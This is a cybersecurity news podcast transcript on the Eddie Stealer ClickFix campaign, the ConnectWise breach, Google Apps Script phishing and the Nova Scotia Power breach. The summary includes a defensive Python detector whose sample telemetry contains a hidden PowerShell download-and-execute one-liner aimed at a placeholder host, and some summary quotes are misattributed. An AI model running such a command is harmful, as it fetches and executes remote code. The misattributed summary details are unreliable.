
In this episode of Cybersecurity Today, host David Shipley discusses several key cyber incidents affecting organizations and individuals. A new Rust-based information stealer, known as Eddie Stealer, is being distributed via deceptive CAPTCHA...
David Shipley
New Eddie Stealer malware distributed via ClickFix CAPTCHA phishing. ConnectWise breached in a cyber attack linked to nation-state threat actors. Threat actors now abusing Google Apps Script in phishing attacks. And thieves gain access to about 140,000 social insurance numbers in the Nova Scotia Power breach. This is Cybersecurity Today and I'm your host, David Shipley. Let's get started.

A new malware campaign is distributing a novel Rust-based information stealer dubbed Eddie Stealer using the popular ClickFix social engineering tactic, initiated via fake CAPTCHA verification pages. The campaign leverages deceptive CAPTCHA verification pages that trick users into executing a malicious PowerShell script which ultimately deploys the info stealer, harvesting sensitive data such as credentials, browser information and cryptocurrency wallet details. According to Elastic Security Labs, the attack chain begins with threat actors compromising legitimate websites with malicious JavaScript payloads that serve bogus CAPTCHA check pages, which prompt site visitors to "prove you are not a robot" by following a three-step process, a prevalent tactic called ClickFix. ClickFix involves instructing potential victims to open the Windows Run dialog prompt, paste an already copied command into the verification window, for example the Run dialog, and press Enter. This effectively causes the obfuscated PowerShell command to be executed, resulting in the retrieval of the next stage of the payload from an external server. The JavaScript payload, gverify.js, is subsequently saved to the victim's Downloads folder and executed using cscript in a hidden window. The main goal of this intermediate script is to fetch the Eddie Stealer binary from the same remote server and store it in the Downloads folder with a pseudo-random 12-character file name. Remember, written in Rust, Eddie Stealer is a commodity stealer malware that can gather system metadata, receive tasks from a command and control, or C2, server, and siphon data of interest from infected hosts. The exfiltration targets include cryptocurrency wallets, web browsers, password managers, FTP clients and messaging apps.

IT management software firm ConnectWise says a suspected state-sponsored cyberattack breached its environment and impacted a, quote, limited number of ScreenConnect customers. ConnectWise said that it recently learned of suspicious activity within its environment that it believed was tied to a sophisticated nation-state actor, which they say affected a very small number of ScreenConnect customers. In a brief advisory note, quote, "We have launched an investigation with one of the leading forensic experts, Mandiant. We have contacted all the affected customers and are now coordinating with law enforcement," end quote. ConnectWise is a Florida-based software company that provides IT management, remote monitoring and management (RMM), cybersecurity and automation solutions for managed service providers and IT departments. One of its products is ScreenConnect, a remote access and support tool that allows technicians to securely connect to client systems for troubleshooting, patching and system maintenance. As first reported by CRN, the company now says it has implemented enhanced monitoring and hardening of security access across its network. They also state that they have not seen any further suspicious activity in customer instances. ConnectWise did not answer questions from Bleeping Computer about how many customers were impacted, when the breach occurred, or whether any malicious activity was observed in customer ScreenConnect instances. However, a source told Bleeping Computer that the breach occurred in August 2024, that ConnectWise discovered this activity in May 2025, and that it only impacted cloud-based ScreenConnect instances. Bleeping Computer says they have not been able to independently confirm those breach dates. Jason Slagle, president of managed service provider CNWR, told Bleeping Computer that only a very small number of customers were impacted, suggesting the threat actor carried out a targeted attack against specific organizations. In a Reddit thread, customers shared further details, stating the incident is linked to a high-severity ScreenConnect vulnerability tracked as CVE-2025-3935, for which a patch was issued on April 24th.

Howard Solomon has a great story that gives a Google twist to the abuse of the Microsoft domain that Jim reported on earlier this week. Threat actors have discovered a way to abuse Google Apps Script to sneak links to malicious websites past phishing defenses. According to new research from Cofense, this new attack has been discovered, and if an employee clicks on a link in a phishing email, they get taken to a page on script.google.com. Now, what is Google Apps Script? Apps Script is a cloud-based JavaScript platform powered by Google Drive that lets developers integrate with and automate tasks across different Google products. With it, Google says, developers can add custom menus, dialogs and sidebars to Google Docs, Sheets and Forms; write custom functions and macros for Google Sheets; publish web apps, either standalone or embedded in Google Sites; and interact with other Google services including AdSense, Analytics, Calendar, Drive, Gmail, Maps and more. The attacker is betting the user will see and trust the Google brand and therefore trust the content. "By using a trusted platform to host the phishing page, the threat actor creates the false sense of security, obscuring the underlying threat with the goal of getting the recipient to enter their email and password without thinking about it," says the report from Cofense. CISOs need to remind employees in regular security awareness training sessions to not let their guard down and to read their email closely for scam clues. They also need to be reminded that a caution popping up that a message is using a tool from a well-known brand like Google is no guarantee the message is safe. And a reminder for all listeners: email filters are fallible. If your team believes that no possible phishes can get by your email filter, they can actually click 140% more on phishing scams. So make sure they know their vigilance can make all the difference.

Nova Scotia Power's CEO says up to 140,000 social insurance numbers could have been stolen by cyber thieves who recently hacked into the utility's customer records. Peter Gregg said in an interview with the Canadian Press Thursday that the privately owned utility collected the numbers from customers to authenticate their identities. For example, Gregg said that they needed the social insurance numbers to differentiate people who had the same name. If there are a number of John McDonalds in the province, the social insurance number determines which one the utility was talking to. On May 23, Gregg said the data of about 280,000 Nova Scotia Power customers was breached in a ransomware attack, more than half of the total. Asked Thursday about how many of those records contain the confidential nine-digit social insurance numbers, Gregg said approximately half. This breach continues to be among the largest, at least in Canada, but likely increasingly in North America, of a utility with highly sensitive customer data exposed.

If you've enjoyed today's episode, please consider liking and sharing it. We want to help even more people stay on top of the crazy world of cybersecurity. We are always interested in your opinion and you can contact us at editorial@technewsday.ca or leave a comment under the YouTube video. I've been your host, David Shipley, sitting in for Jim Love, who will be back on Wednesday. Thanks for listening.
Cybersecurity Incidents: Eddie Stealer Malware, ConnectWise Breach, and Nova Scotia Power Data Theft
Cybersecurity Today
Host: Jim Love
Release Date: June 2, 2025
The episode kicks off with an in-depth analysis of a new malware campaign involving the Eddie Stealer, a Rust-based information stealer. This malware is being distributed through the ClickFix CAPTCHA phishing tactic, which manipulates users into executing malicious PowerShell scripts via deceptive CAPTCHA verification pages.
Key Points:
The intermediate JavaScript payload (gverify.js) downloads the Eddie Stealer binary, which is stored in the Downloads folder with a randomized 12-character filename. Eddie Stealer is capable of harvesting sensitive information, including credentials, browser data, and cryptocurrency wallets.
Notable Quote:
"The main goal of this intermediate script is to fetch the Eddie Stealer binary from the same remote server and store it in the Downloads folder with a pseudo-random 12-character file name."
— David Shipley [02:15]
Impact: According to Elastic Security Labs, Eddie Stealer can extract system metadata and siphon data from various applications, posing a significant threat to personal and organizational security.
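As an added example (not code from the episode, from Elastic Security Labs, or from any source quoted here), the following Python shows how a defender might hunt for the ClickFix chain summarised above in process-creation telemetry: explorer.exe, which hosts the Windows Run dialog, spawning a shell with download-and-execute vocabulary; a script host running a .js file out of the Downloads folder; and a 12-character random-named executable launched from Downloads. Field names follow Sysmon Event ID 1; the events, user names, file names and the placeholder.invalid host are all constructed for illustration, and the rule names are my own.

```python
"""Heuristics for the ClickFix -> PowerShell -> cscript -> Downloads chain,
evaluated over process-creation events (Sysmon Event ID 1 style fields).
All events below are CONSTRUCTED samples, not real telemetry."""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events; the URL host is a placeholder, not a real C2.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"User": "CORP\\alice", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe report.txt"},                 # benign
    {"User": "CORP\\alice", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": PS_EXE,                                          # pasted into Run dialog
     "CommandLine": 'powershell -w hidden -ep bypass -c "iwr http://placeholder.invalid/a | iex"'},
    {"User": "CORP\\alice", "ParentImage": PS_EXE,
     "Image": r"C:\Windows\System32\cscript.exe",              # stage-2 script host
     "CommandLine": r"cscript.exe //B C:\Users\alice\Downloads\gverify.js"},
    {"User": "CORP\\alice", "ParentImage": r"C:\Windows\System32\cscript.exe",
     "Image": r"C:\Users\alice\Downloads\qzkrtblvmwpe.exe",   # random 12-char stem
     "CommandLine": r"C:\Users\alice\Downloads\qzkrtblvmwpe.exe"},
    {"User": "CORP\\bob", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": PS_EXE,                                          # benign admin use
     "CommandLine": "powershell Get-Service -Name Spooler"},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}
# Download-and-execute vocabulary typical of a pasted one-liner.
DOWNLOAD_EXEC = re.compile(
    r"(iwr|invoke-webrequest|downloadstring|downloadfile|iex|invoke-expression|"
    r"frombase64string|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden)", re.I)
# A script file referenced from a Downloads folder.
DOWNLOADS_SCRIPT = re.compile(r"\\Downloads\\[^\\\s\"]+\.(js|jse|vbs|vbe|wsf)\b", re.I)
RANDOM_12 = re.compile(r"^[a-z0-9]{12}$")


def _basename(path: str) -> str:
    """Lower-cased final path component, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_rules(ev: Dict[str, str]) -> List[str]:
    """Return the names of every heuristic the event trips (possibly none)."""
    hits: List[str] = []
    parent = _basename(ev.get("ParentImage", ""))
    image = _basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    # Stage 1: the Run dialog is hosted by explorer.exe, so the pasted command
    # appears as explorer.exe spawning a shell with download/execute keywords.
    if parent == "explorer.exe" and image in SHELLS and DOWNLOAD_EXEC.search(cmd):
        hits.append("run_dialog_download_exec")
    # Stage 2: a script host executing a script from the Downloads folder.
    if image in SCRIPT_HOSTS and DOWNLOADS_SCRIPT.search(cmd):
        hits.append("script_host_from_downloads")
    # Stage 3: an executable in Downloads whose stem is 12 random-looking
    # characters. Weak alone (legitimate names can match); it matters only
    # when combined with the stages above.
    if ("\\downloads\\" in ev.get("Image", "").lower()
            and image.endswith(".exe") and RANDOM_12.match(image[:-4])):
        hits.append("random_12char_exe_in_downloads")
    return hits


def correlate(events: Iterable[Dict[str, str]]) -> Dict[str, Tuple[str, List[str]]]:
    """Group hits per user; two or more distinct stages for one user -> high."""
    by_user: Dict[str, set] = defaultdict(set)
    for ev in events:
        for rule in match_rules(ev):
            by_user[ev.get("User", "?")].add(rule)
    return {user: ("high" if len(rules) >= 2 else "medium", sorted(rules))
            for user, rules in by_user.items()}


if __name__ == "__main__":
    for user, (severity, rules) in correlate(SAMPLE_EVENTS).items():
        print(f"{user}: {severity} {rules}")
```

Each stage is a separate, fairly noisy signal; the correlation step is what turns them into a confident finding, and in practice the per-user grouping would also be bounded by a time window.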
The discussion transitions to a significant breach at ConnectWise, a Florida-based IT management software firm. The breach is suspected to be orchestrated by sophisticated nation-state threat actors, targeting a limited number of ScreenConnect customers.
Key Points:
Notable Quotes:
"We have launched an investigation with one of the leading forensic experts, Mandiant. We have contacted all the affected customers and are now coordinating with law enforcement."
— ConnectWise Advisory [05:30]
"Only a very small number of customers were impacted, suggesting the threat actor carried out a targeted attack against specific organizations."
— Jason Slagle, President of CNWR [08:45]
Impact: While the exact number of affected customers remains undisclosed, sources indicate that the breach was highly targeted, emphasizing the persistent threats posed by nation-state actors to specialized software solutions.
Howard Solomon highlights a novel phishing strategy where attackers exploit Google Apps Scripts to bypass traditional phishing defenses, embedding malicious links within trusted Google-hosted environments.
Key Points:
Phishing links lead to a page on script.google.com, leveraging the trust associated with Google services to establish legitimacy.
Notable Quotes:
"By using a trusted platform to host the phishing page, the threat actor creates the false sense of security, obscuring the underlying threat with the goal of getting the recipient to enter their email and password without thinking about it."
— David Shipley [12:05]
"If your team believes that no possible phishes can get by your email filter, they can actually click 140% more on phishing scams."
— Report from Cofense [14:50]
Mitigation Strategies: CISOs are urged to reinforce regular security awareness training, emphasizing vigilance against even seemingly legitimate messages and recognizing that brand association does not guarantee safety.
The final segment addresses a major data breach at Nova Scotia Power, where cyber thieves accessed sensitive customer information, including up to 140,000 social insurance numbers.
Key Points:
Notable Quotes:
"We needed the social insurance numbers to differentiate people who had the same name. If there are a number of John McDonald's in the province, the social insurance number determines which one the utility was talking to."
— Peter Gregg, CEO of Nova Scotia Power [19:30]
Impact: This breach stands as one of the largest in Canada, reflecting the escalating risk to utilities that manage highly sensitive customer data. The exposure of SINs poses significant risks for identity theft and fraud among affected individuals.
The episode underscores the evolving landscape of cybersecurity threats, from sophisticated malware distribution methods and targeted nation-state attacks to innovative phishing strategies leveraging trusted platforms. The highlighted incidents emphasize the critical need for robust security measures, continuous monitoring, and comprehensive employee training to mitigate risks and protect sensitive data.
Listener Takeaway: Stay informed about the latest cybersecurity threats, maintain vigilant security practices, and ensure that both technological defenses and human factors are addressed to safeguard against increasingly complex cyberattacks.
This summary was prepared based on the transcript of the June 2, 2025, episode of Cybersecurity Today, hosted by Jim Love. For more insights and updates, consider listening to the full episode.